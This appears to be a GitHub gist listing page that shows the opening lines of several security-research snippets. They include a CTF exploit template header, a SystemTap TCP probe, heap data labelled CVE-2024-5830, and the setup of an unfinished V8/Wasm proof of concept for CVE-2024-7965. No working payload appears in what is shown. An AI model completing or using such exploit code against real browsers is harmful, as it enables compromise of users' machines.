
buptsb

// Session is a struct whose only declared field is a slice of network
// connections.
// NOTE(review): presumably one logical session spread over several
// connections, with the notes that follow sketching a timeout handler that
// picks a connection not yet in "history" — confirm against the full file.
type Session struct {
// Conns holds the session's net.Conn values. No lock is declared alongside
// it, so code that reads or mutates this slice from a timer callback and a
// send path at the same time would need its own synchronization — TODO confirm
// how it is accessed.
Conns []net.Conn
}
packet
timeout timer
history
onTimeout
// ? find another conn(not in history)
buptsb / exp5.c
Last active November 14, 2019 04:53
csci1650/csci1951 ctf-3
/*
* CTF-2 `vcat5' exploit (template)
*
* Vasileios P. Kemerlis <[email protected]>
* - CSCI 1951H: Software Security and Exploitation
* - https://cs.brown.edu/courses/csci1951-h/
*/
#include <stdio.h>
#include <stdlib.h>
diff --git a/third_party/blink/renderer/bindings/core/v8/v8_dom_configuration.cc b/third_party/blink/renderer/bindings/core/v8/v8_dom_configuration.cc
index d84004cd41..739ba61e9f 100644
--- a/third_party/blink/renderer/bindings/core/v8/v8_dom_configuration.cc
+++ b/third_party/blink/renderer/bindings/core/v8/v8_dom_configuration.cc
@@ -520,7 +520,7 @@ void InstallMethodInternal(
if (!WorldConfigurationApplies(config, world))
return;
- v8::Local<v8::String> name = config.MethodName(isolate);
+ v8::Local<v8::Name> name = config.MethodName(isolate);
buptsb / tcp_data_queue.stp
Created February 13, 2021 09:25
monitor tcp data enqueue
sudo stap -v -e 'probe kernel.function("tcp_data_queue") {
tcphdr = __get_skb_tcphdr($skb);
sport = __tcp_skb_sport(tcphdr);
if (sport == 34025) {
seq = @cast($skb->cb, "tcp_skb_cb")->seq;
end_seq = @cast($skb->cb, "tcp_skb_cb")->end_seq;
printf("%d %d %d %d\n", sport, seq, end_seq, end_seq - seq);
// print_backtrace();
// exit()
}
buptsb / RO_heap_parse_result.txt
Last active June 21, 2024 01:55
CVE-2024-5830: incorrect handling of deprecated map in [[CreateDataProperty]]
[
{
"offset": 0,
"binary": "0x5f000000",
"fieldIndex": 1,
"repr": 4,
"kind": 1
},
{
"offset": 4,
buptsb / CVE-2024-7965.poc.js
Last active October 18, 2024 08:56
CVE-2024-7965 unfinished poc
// ./d8 --allow-natives-syntax --trace-turbo --trace_turbo_graph --trace_deopt --trace_compilation_dependencies --trace_wasm_compiler --code-comments --compile_hints_magic --trace-wasm-decoder --soft-abort --expose-gc ~/cves/CVE-2024-7965/1.js
const prefix = "...";
d8.file.execute(`${prefix}/test/mjsunit/wasm/wasm-module-builder.js`);
const builder = new WasmModuleBuilder();
const $g0 = builder.addGlobal(kWasmI32, true, false);
const $g1 = builder.addGlobal(kWasmI32, true, false);
const $g2 = builder.addGlobal(kWasmI64, true, false);
const $g3 = builder.addGlobal(kWasmI64, true, false);